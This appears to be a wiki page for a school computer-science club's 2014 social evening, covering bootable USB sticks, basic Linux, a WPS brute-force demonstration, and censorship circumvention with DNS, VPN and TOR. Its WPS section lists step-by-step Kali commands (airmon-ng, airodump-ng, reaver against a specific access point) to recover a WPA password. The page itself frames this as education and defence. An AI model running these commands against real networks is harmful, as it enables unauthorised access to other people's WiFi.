From GIS CS4
Jump to: navigation, search



  • Saturday 17th May 2014
  • From 17:00 (5pm) onwards (soft start) - come earlier or later as you wish.

Suggest we plan to start watching the chosen film at around 19:00 (7pm) so that we can be finished around 9pm (21:00).

People are free to come/go when they like.


The Oliver's house

We will be providing Pizza and Icecream!


The tasks for the evening:


If you have the following that you are permitted to bring, then please do:

  • Laptop (preferable MS Windows) - we will NOT be changing the existing installation
  • USB Memory Stick (suitable to be wiped)

If you do not have a laptop or USB Memory stick, not to worry - let us know.

Hacking Notes

Creating Bootable USB Memory Stick

UBuntu Only USB

Multiboot USB

Running UBuntu Linux on existing Windows computer without changing anything

Basic Linux/Unix commands


Hacking Wireless WPS Access Point using Reaver

What is WPS?

Wi-Fi Protected Setup, or WPS is a computing standard that attempts to allow easy establishment of a secure wireless home network.

The idea is to quickly allow a WiFi device such as a laptop or smartphone to connect to a WiFi Access Point without having to remember the lengthy WiFi WPA encryption key.

For more information, see Wikipedia page on WPS.

What is wrong with WPS?

In December 2011 researcher Stefan Viehböck reported a design and implementation flaw that makes brute-force attacks against PIN-based WPS feasible to perform on WPS-enabled Wi-Fi networks. A successful attack on WPS allows unauthorized parties to gain access to the network. The only effective workaround is to disable WPS.

For more details, see WPS Security Problem.

How can I defend myself from this WPS vulnerability?

All you need to do is disable the WPS feature.

By default all WiFi routers have to have WPS enabled - this is a requirement for their WiFi license.

Apple's Airport Extreme/Express has WPS disabled by default.

At the time of writing, pretty much ALL Cisco/Linksys WiFi routers/access points could not have their WPS feature disabled - a bug in all their firmwares. Even when the WPS option is disabled, the WPS functionality is still enabled.

Some Cisco/Linksys WiFi routers cannot have their WiFi turned off properly either!

If you have a Cisco/Linksys or similarly affected device, you have following options:

  • buy a new WiFi router
  • turn off WiFi functionality - optionally buy a new WiFi access point to provide that functionality (Apple Airport Express/Extremes are good)
  • configured the Cisco/Linksys's WiFi to use an out-of-band frequency channel (13/14), turn off SSID broadcasting, enable MAC address filtering, set a very strong WPA password, etc etc... and then buy yourself a new WiFI access point to provide WiFi functionality

How easy is it to Brute-Force attack WPS

Very Easy...

'See this YouTube video for details

All you need is to download and install UBuntu Linux, then download and run the Reaver Attack Tool.

Step-by-step instructions

It typically takes 4-10 hours to obtain the WPA password.

  • Download Kali Linux
  • Create bootable DVD or USB (YUMI USB Creator)
  • Boot Kali
  • apt-get install aircrack-ng (already installed in Kali)
  • apt-get install reaver (already installed in Kali)
  • iwconfig
  • airmon-ng start wlan0
  • airodump-ng mon0
  • reaver -i mon0 -b C8:3A:35:30:E5:B8 -vv --pin=32045369

Note that to save time, the above 'reaver' command we are pre-starting the scan from the actual pin - otherwise it would take some 6 hours to complete...

Is it legal to attempt to Brute-Force attack somebody elses WPS enabled WiFi?


However you might like to tell them about the vulnerability. If they are willing, you could demonstrate how easily it can be done by running the above Reaver Attack Tool.

Censorship Circumvention

DNS Poisoning

DNS - Wiki

ISP's/countries attempt to stop access to a particular website by poisoning their DNS. For example, Turkey.

For example, if a web browser wishes to access '', instead of returning the correct IP address (, it returns a fake or government IP address.

DNS Poisoning Circumventon

The solution is to use alternative 'good' DNS servers - for example, OpenDNS.

Recommend using DNSCrypt.

IP Address Blocking

DNS Poisoning is very easy to circumvent.

The next level is to block access to specific IP addresses. For example, Great Firewall of China, or corporate/company/school firewalls.

Part of the function of the firewall is to perform:

  • URL monitoring (where users are visiting)
  • Content monitoring (what text/images users are seeing/sending)
  • Deep Packet Analysis (detect what circumvention mechanism users are trying/using)

Note that the same technology to stop inappropriate web access within schools is used by governments to stop human right/etc groups and control media access.

VPN - Virtual Private Network

VPN - Wiki

'It enables a computer to send and receive data across shared or public networks as if it is directly connected to the private network, while benefiting from the functionality, security and management policies of the private network.'

ISPs/governments can see that the user (i.e. you) is connected to some remote VPN service. They can determine the amount of data being sent/received, but cannot directly know the data contents. However researchers have been able to determine message content by analysing the encrypted data length.

Note that depending on the user's computer configuration or VPN setup, it is very possible for the computer to leak information about what websites the user is accessing. That might be sufficient for authorities to issue arrest warrants.

TOR - The Onion Router

TOR - Wiki

TOR - The Onion Router

The Amnesia Incognito Live System

How Governments Have Tried To Block TOR

Dealing With A Dead Computer

What Film Should We Watch

By popular demand (50% in class vote), we will be watching:

'War Games' (1983) - 1'53

Wiki information Trailer

Other Films We Considered

'Tron' (1982) - 1'30

Wiki information Trailer

'Tron: Legacy' (2010) - 2'05

Wiki information Trailer

'Short Circuit' (1986) - 1'38

Wiki information Trailer

Doctor Who: 'The Bells of Saint John' (2013 - S07E06) - 0'45

Wiki information Trailer

BBC: Code Breakers Bletchley Parks lost Heroes - 0'59

information + trailer